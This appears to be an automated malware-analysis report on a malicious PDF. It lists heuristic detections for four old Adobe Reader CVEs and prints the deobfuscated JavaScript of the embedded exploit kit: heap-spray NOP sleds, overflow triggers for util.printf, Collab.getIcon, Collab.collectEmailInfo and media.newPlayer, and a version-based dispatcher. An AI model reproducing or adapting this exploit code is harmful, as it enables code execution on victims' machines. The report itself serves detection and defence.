MALICIOUS
468
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 9
-
media.newPlayer — CVE-2009-4324 | critical | CVE exact | CVE_2009_4324 — PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 | critical | CVE exact | CVE_2009_0927 — PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 | critical | CVE exact | CVE_2007_5659 — PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 | critical | CVE exact | CVE_2008_2992 — PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher | critical | CVE likely | PDF_PIDIEF_MULTI_CVE_DISPATCH — A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit | critical | PDF_ADOBE_READER_MULTI_CVE_JS_KIT — One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF selects old Reader vulnerabilities by viewer version and runs heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action | low | 1 related finding | PDF_JAVASCRIPT — PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream | low | PDF_JS — PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE — One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0012_000.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0x1179 | 93 bytes |
SHA-256: 61b46047f90b888a00e497def64b956f6da2cb6e69e8905a21e0ba446aa10cd0 |
|||
Preview script — First 1,000 lines of the extracted script
m1=this.info.gkds;m2=m1.replace(/zzzzz/g,"");m3=this.info.gggsd+"al"; app[m3](m2); |
|||
info_stride_js_000.js |
deobfuscated-js | PDF /Info fields via stride 6 | 8386 bytes |
SHA-256: c4af40a400b5e719e43fa2986832a24305be4fa33cb30fc4468ebe62df630cdb |
|||
|
Detection
ClamAV:
Pdf.Exploit.Agent-35646
Obfuscation or payload:
likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview script — First 1,000 lines of the extracted script
function hddd(fff)
{
return fff.split("**").join("%"+"u");
}
shcode_geticon = hddd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
shcode_newplayer = hddd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
shcode_printf = hddd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
shcode_collab = hddd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
function nplayer() {
function kzbve()
{
var eobwe="p@111111111111111111111111 : yyyy111";
util.printd(eobwe, new Date());
}
var grizxw=12000;
jucobu=new Array();
var klkng = "%u9090%u9090";
var hwjnalb8=shcode_newplayer;
klkng=unescape(klkng);
hwjnalb8=unescape(hwjnalb8);
while(klkng.length <= 0x8000){klkng+=klkng;}
klkng=klkng.substr(0,0x8000 - hwjnalb8.length);
for(fzfwam=0;fzfwam<grizxw;fzfwam++) {jucobu[fzfwam]=klkng + hwjnalb8;}
if(grizxw){kzbve();kzbve();try {this.media.newPlayer(null);} catch(e) {}kzbve();}
}
function printf() {
var payload=unescape(shcode_printf);
var nop ="";
for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + payload;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize+heapblock.length;
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;
var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
util.printf("%45000f",num);
}
function geticon() {
var shellcode=unescape(shcode_geticon);
garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090");
headersize = 10;
acl = headersize+garbage.length;
while (nopblock.length<acl) nopblock+=nopblock;
fillblock = nopblock.substring(0, acl);
block = nopblock.substring(0, nopblock.length-acl);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<180;i++) memory[i] = block + garbage;
var buffersize = 4012;
var buffer = Array(buffersize);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("%0a%0a%0a%0a");
}
Collab.getIcon(buffer+"_N.bundle");
}
function collab() {
function fix_it(yarsp,len) {
while(yarsp.length*2<len) { yarsp+=yarsp; }
yarsp=yarsp.substring(0,len/2);
return yarsp; }
var shellcode=unescape(shcode_collab);
var mem_array=new Array();
var cc=0x0c0c0c0c;
var addr=0x400000;
var sc_len=shellcode.length*2;
var len=addr-(sc_len+0x38);
var yarsp=unescape("%u9090%u9090");
yarsp=fix_it(yarsp,len);
var count2=(cc-0x400000)/addr;
for(var count=0;count<count2;count++) {mem_array[count]=yarsp+shellcode; }
var overflow=unescape("%u0c0c%u0c0c");
while(overflow.length<44952) {overflow+=overflow; }
this.collabStore=Collab.collectEmailInfo( { subj:"",msg:overflow } );
}
aPlugins = app.plugIns;
var sv=parseInt(app.viewerVersion.toString().charAt(0));
for (var i=0; i < aPlugins.length; i++)
{
if (aPlugins[i].name=="EScript")
{
var lv=aPlugins[i].version;
}
}
if ((lv==9)||((sv==8)&&(lv<=8.12)))
{
geticon();
}
else if (lv==7.1)
{
printf();
}
else if (((sv==6)||(sv==7))&&(lv<7.11))
{
collab();
}
else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))
{
nplayer();
}
|
|||